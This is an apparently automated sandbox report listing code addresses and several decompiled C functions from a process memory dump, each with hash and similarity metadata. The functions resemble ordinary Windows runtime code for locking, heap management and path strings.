0x04d242c2
0x04d242ca
0x04d242cd
0x04d242cd
0x04d242d4
0x04d2433f
0x04d2433f
0x04d242d6
0x04d242d6
0x04d242d9
0x04d242dd
0x04d242eb
0x04d6e23a
0x04d242f1
0x04d24305
0x04d2430d
0x04d24315
0x04d24318
0x04d2431f
0x04d24322
0x04d2432e
0x04d2433b
0x04d2433b
0x00000000
0x04d2432e
0x04d242eb
0x04d2434c
0x04d2434e
0x04d24352
0x04d24359
0x04d2435e
0x04d24361
0x04d2436e
0x04d2438a
0x04d2438e
0x04d24396
0x04d2439e
0x04d243a1
0x04d243ad
0x04d243bb
0x04d243bb
0x04d243ad
0x04d2436e
0x04d243bf
0x04d243c5
0x04d24463
0x04d24463
0x04d243ce
0x04d243d5
0x04d243d9
0x04d243df
0x04d24475
0x04d24479
0x04d24491
0x04d24491
0x04d24479
0x04d243e5
0x04d243eb
0x04d243f4
0x04d243f6
0x04d243f9
0x04d243fc
0x04d243ff
0x04d244e8
0x04d244ed
0x04d244f3
0x04d6e247
0x00000000
0x04d244f9
0x04d24504
0x04d24508
0x04d2450f
0x04d6e269
0x00000000
0x04d24515
0x04d24519
0x04d24531
0x04d24534
0x04d24537
0x04d2453e
0x04d24541
0x04d2454a
0x04d6e255
0x04d6e255
0x04d6e25b
0x04d6e25e
0x04d6e261
0x04d6e261
0x04d24555
0x04d24559
0x04d2455d
0x04d6e26d
0x04d6e270
0x04d6e274
0x04d6e27a
0x04d6e27d
0x04d6e28e
0x04d6e28e
0x04d24563
0x04d24563
0x04d24569
0x04d24569
0x00000000
0x04d2455d
0x04d2450f
0x00000000
0x04d244f3
0x04d243ff
0x04d24405
0x04d24405
0x04d24405
0x04d242ac
0x04d2428c
0x04d24282
0x04d24407
0x04d2440d
0x04d6e2af
0x04d6e2af
0x04d24413
0x04d24413
0x00000000
0x04d241d4
0x00000000
0x04d241c3
0x04d241bd
0x04d24415
0x04d24415
0x04d24416
0x04d24417
0x04d24429
0x04d2416e
0x04d2416e
0x04d24175
0x04d24498
0x04d2449f
0x04d6e12d
0x00000000
0x04d6e133
0x00000000
0x04d6e133
0x04d244a5
0x04d244a5
0x04d244aa
0x00000000
0x04d244bb
0x04d244ca
0x04d244d6
0x04d244d7
0x04d244d8
0x04d244e3
0x04d244e3
0x04d244aa
0x04d2417b
0x04d2417b
0x04d2417b
0x00000000
0x04d2417b
0x04d24175
0x00000000

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242bf0a149ead14822305f735e6c94b795d969396949abcae830cb5d3dd3d35b
Instruction ID: 06e23f38455c19e949b8300bdf2f5d948799a9f8f693996fb80b80297b6db43d
Opcode Fuzzy Hash: 242bf0a149ead14822305f735e6c94b795d969396949abcae830cb5d3dd3d35b
Instruction Fuzzy Hash: 74F18F746086618FC724CF19C590A3AB7E1FFA8718F14892EF8C6CB250E774E991DB52

Uniqueness

Uniqueness Score: -1.00%

Function 04D052A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04D052A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04D1EEF0(0x4df79a0);
					_t104 =  *0x4df8210; // 0xc82cb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E04D1EB70(_t93, 0x4df79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04D49890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04D1EEF0(0x4df79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04D1EB70(0, 0x4df79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xc82cbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04D3F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04D1EEF0(0x4df79a0);
									__eflags =  *0x4df8210 - _t104; // 0xc82cb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4df8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E04D84888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E04D1EB70(_t95, 0x4df79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04D495D0();
											L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04D495D0();
											L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04D1EB70(_t93, 0x4df79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E04D495D0();
										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04D495D0();
										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04D3F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x04d052a5
0x04d052ad
0x04d052b0
0x04d052b3
0x04d052b7
0x04d052ba
0x04d052bf
0x04d052c4
0x04d052cc
0x00000000
0x00000000
0x04d052ce
0x04d052d9
0x04d052dd
0x04d052e7
0x04d052f7
0x04d052f9
0x04d052fd
0x04d60dcf
0x04d60dd5
0x04d60dd6
0x04d60dd7
0x04d60dd8
0x04d60dd9
0x04d60dde
0x04d60ddf
0x04d60de0
0x04d60de1
0x04d60de2
0x04d60de5
0x04d60dea
0x04d60dec
0x04d60f60
0x04d60f64
0x04d60f70
0x04d60f76
0x04d60f79
0x04d60f79
0x00000000
0x04d60f64
0x04d60df2
0x04d60df7
0x04d60e04
0x04d60e0d
0x04d60e0d
0x04d60e10
0x04d60e1a
0x04d60e1c
0x04d60e4c
0x04d60e52
0x04d60e61
0x04d60e67
0x04d60e6b
0x04d60e70
0x04d60e76
0x04d60ed7
0x04d60edc
0x04d60ee0
0x04d60ee6
0x04d60eea
0x04d60eed
0x04d60ef0
0x04d60ef3
0x04d60ef6
0x04d60ef9
0x04d60efe
0x04d60f01
0x04d60f01
0x04d60f0b
0x04d60f12
0x04d60f16
0x04d60f18
0x04d60f1b
0x04d60f2c
0x04d60f31
0x04d60f31
0x04d60f35
0x04d60f39
0x04d60f3a
0x04d60f3c
0x04d60f3f
0x04d60f50
0x04d60f55
0x04d60f55
0x04d60f59
0x04d052eb
0x04d052f1
0x04d052f1
0x04d60e7d
0x04d60e84
0x04d60e88
0x04d60e8a
0x04d60e8d
0x04d60e9e
0x04d60ea3
0x04d60ea3
0x04d60ea7
0x04d60eaf
0x04d60eb3
0x04d60eb9
0x04d60eb9
0x04d60ebc
0x04d60ecd
0x04d60ecd
0x00000000
0x04d60eb3
0x04d60e21
0x04d60e2b
0x04d60e2f
0x04d60e30
0x04d60e3a
0x04d60e3f
0x04d60e41
0x00000000
0x00000000
0x04d60e47
0x00000000
0x04d60e47
0x04d60df9
0x04d60dfe
0x00000000
0x00000000
0x00000000
0x04d60dfe
0x04d05303
0x04d05307
0x00000000
0x04d05309
0x00000000
0x04d05309
0x04d05307
0x04d052e9
0x04d052e9
0x00000000
0x04d052e9
0x04d0530e
0x00000000

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117b2315285220007bb2478d7e349b48082f2add1187363937cfc6e2155d7514
Instruction ID: 6fd58c1c05a2eea9a38f24d90e0f91a775e2f8c7af13a7781e98fa0c93fc18c5
Opcode Fuzzy Hash: 117b2315285220007bb2478d7e349b48082f2add1187363937cfc6e2155d7514
Instruction Fuzzy Hash: 2351DF71205742AFE721EF68D940B27BBE4FF50718F14891EE89687691E770F844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04D1EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04D1EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04D09080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x779cc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04D02D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x04d1ef4b
0x04d1ef4d
0x04d1ef57
0x04d1f0bd
0x04d1f0c2
0x04d1f0d2
0x04d1f0d2
0x04d1f0c2
0x04d1ef5d
0x04d1ef5f
0x04d1ef67
0x04d1ef6a
0x04d1ef6d
0x04d1ef74
0x04d1ef7f
0x04d1ef82
0x04d1ef82
0x04d1ef86
0x04d1ef88
0x04d1ef8c
0x04d1ef8f
0x04d1ef8f
0x04d1ef8f
0x00000000
0x04d1ef91
0x04d1ef93
0x04d1efc4
0x04d1efc4
0x04d1efc4
0x04d1efca
0x04d1efd0
0x04d1f0a6
0x00000000
0x00000000
0x04d1f0af
0x04d6bb06
0x04d6bb0a
0x04d1f0b5
0x04d1f0b5
0x04d1f0b5
0x04d1f0b5
0x00000000
0x04d1efd6
0x04d1efd9
0x04d1f0de
0x04d1f0e2
0x04d1efdf
0x04d1efdf
0x04d1efdf
0x04d1efe5
0x04d6bafc
0x04d6bafc
0x04d1efe5
0x04d1efeb
0x04d1efed
0x04d1f00f
0x04d1f011
0x04d1f01a
0x04d1f01d
0x04d1f021
0x04d1f028
0x04d1f029
0x04d1f029
0x04d1f02c
0x00000000
0x04d1f02c
0x04d1eff3
0x04d1eff9
0x04d1f0ea
0x04d1f0ed
0x04d1f0ef
0x00000000
0x04d1f0ef
0x04d1f003
0x04d6bb12
0x04d1f045
0x04d1f049
0x04d1f051
0x04d1f09e
0x04d1f0a0
0x04d1f0a0
0x04d1f09e
0x04d1f053
0x04d1f064
0x04d1f064
0x04d1f06b
0x04d6bb1a
0x04d6bb1a
0x04d1f071
0x04d1f071
0x04d1f07d
0x04d1f082
0x04d1f08f
0x04d1f08f
0x04d1f009
0x04d1f00d
0x00000000
0x04d1f00d
0x04d1efd0
0x04d1ef97
0x04d1efa5
0x04d1efaa
0x00000000
0x04d1efac
0x04d1efac
0x04d1efac
0x00000000
0x04d1efb2
0x04d1f036
0x04d1f03a
0x04d1f040
0x04d1f090
0x00000000
0x04d1f092
0x04d1f042
0x00000000
0x04d1f042
0x04d1efb7
0x04d1efb9
0x04d1efbc
0x04d1efb0
0x04d1efb0
0x00000000
0x04d1efbe
0x04d1efbe
0x04d1efc1
0x00000000
0x04d1efc1
0x04d1efbc
0x04d1efaa
0x04d1ef91

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: dd612bb6ed581db3b5abc4636981604fa7d56e6c23598aa853ab2cc951648081
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 0E51C130B04249AFDB24CF68E0907AEBBB1BF05314F1881AEDD85972A1D375B989D791

Uniqueness

Uniqueness Score: -1.00%

Function 04D43D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D43D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04D17B60(0, _t61, 0x4ce11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04D17B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04D24620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x04d43d4c
0x04d43d50
0x04d43d55
0x04d43d5e
0x04d7e79a
0x00000000
0x04d7e79a
0x04d43d68
0x04d7e789
0x04d43d9d
0x04d43da3
0x04d43daf
0x04d43db5
0x04d43dbc
0x04d43dc4
0x04d43dc9
0x04d43dce
0x04d7e7ae
0x04d7e7ae
0x04d43dde
0x04d43de2
0x04d43de7
0x04d43e0d
0x04d43e13
0x04d43e16
0x04d43e1e
0x04d43e25
0x04d43e28
0x00000000
0x00000000
0x04d43e2a
0x04d43e2f
0x04d43e37
0x04d43e37
0x00000000
0x04d43e37
0x04d43e31
0x00000000
0x04d43e31
0x04d43e20
0x04d43e20
0x04d43e35
0x00000000
0x04d43de9
0x04d43de9
0x04d43de9
0x04d43dee
0x04d43dfd
0x04d43dff
0x04d43e02
0x04d43e05
0x04d43e05
0x00000000
0x04d43df0
0x04d43de7
0x04d7e78f
0x04d7e794
0x04d43d79
0x04d43d84
0x04d43d89
0x04d43d8e
0x00000000
0x04d7e7a4
0x04d43d96
0x04d43d9a
0x00000000
0x04d43d9a
0x00000000
0x04d7e794
0x04d43d6e
0x04d43d73
0x00000000
0x04d7e7b5
0x00000000

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26c512d925090f7cae913652692b5036cd54b2175c3276bc3f2ebbac89a801f6
Instruction ID: 8469705940ddaea7660a220ff5b5ea5402839c9ccbb16b13efcf48992a8f2caa
Opcode Fuzzy Hash: 26c512d925090f7cae913652692b5036cd54b2175c3276bc3f2ebbac89a801f6
Instruction Fuzzy Hash: F8317A31B05625DBD7288F2ED841A6ABBF5FF95710B05806AE889CB260F730E940DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D87016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04D87016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4dfd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04D86B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04D86B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04D27D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04D49AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04D4B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04D24620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x04d87016
0x04d8701e
0x04d8702b
0x04d87033
0x04d87037
0x04d8703c
0x04d8703e
0x04d87041
0x04d87045
0x04d8704a
0x04d87050
0x04d87055
0x04d8705a
0x04d87062
0x04d87062
0x04d8705a
0x04d87064
0x04d87064
0x04d87067
0x04d87071
0x04d87096
0x04d8709b
0x04d870a2
0x04d870a6
0x04d870a7
0x04d870ad
0x04d870b3
0x04d870b6
0x04d870bb
0x04d870c3
0x04d870c3
0x04d870c6
0x04d870cd
0x04d870dd
0x04d870e0
0x04d870e2
0x04d870e2
0x04d870ee
0x04d87101
0x04d870f0
0x04d870f9
0x04d870f9
0x04d8710a
0x04d8710e
0x04d87112
0x04d87117
0x04d87118
0x04d87118
0x04d870bb
0x04d8711d
0x04d87123
0x04d87131
0x04d87131
0x04d87136
0x04d8713d
0x04d8713e
0x04d8713f
0x04d8714a
0x04d8714a
0x04d87084
0x04d87088
0x00000000
0x04d8708e
0x04d8708e
0x04d87092
0x00000000
0x04d87092

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb542eb4fb5bd1c45464d51b32100dbe1e71e72a491d5c877f0736edcf07ca63
Instruction ID: 90e677e94a275b6ff492a520c291cd34a334b1e143bec1fe5dc89521eff2cdde
Opcode Fuzzy Hash: bb542eb4fb5bd1c45464d51b32100dbe1e71e72a491d5c877f0736edcf07ca63
Instruction Fuzzy Hash: B1317E726047519BC320EF68CD41A7AB7E9FF88704F144A2DF8959B690E734F904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 04D2C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E04D2C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04D27D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04DD8D34(_v8, _t80);
					}
					E04D22280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04D1FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04DD8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04D1FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04D4B180();
						if(_a4 != 0) {
							E04D22280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04D2BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04D2BB2D(_t16, _t15);
						E04D2B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04D1FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04D1FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04D1FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x04d2c18d
0x04d2c18f
0x04d2c191
0x04d2c19b
0x04d2c1a0
0x04d2c1d4
0x04d2c1de
0x04d72d6e
0x04d2c1e4
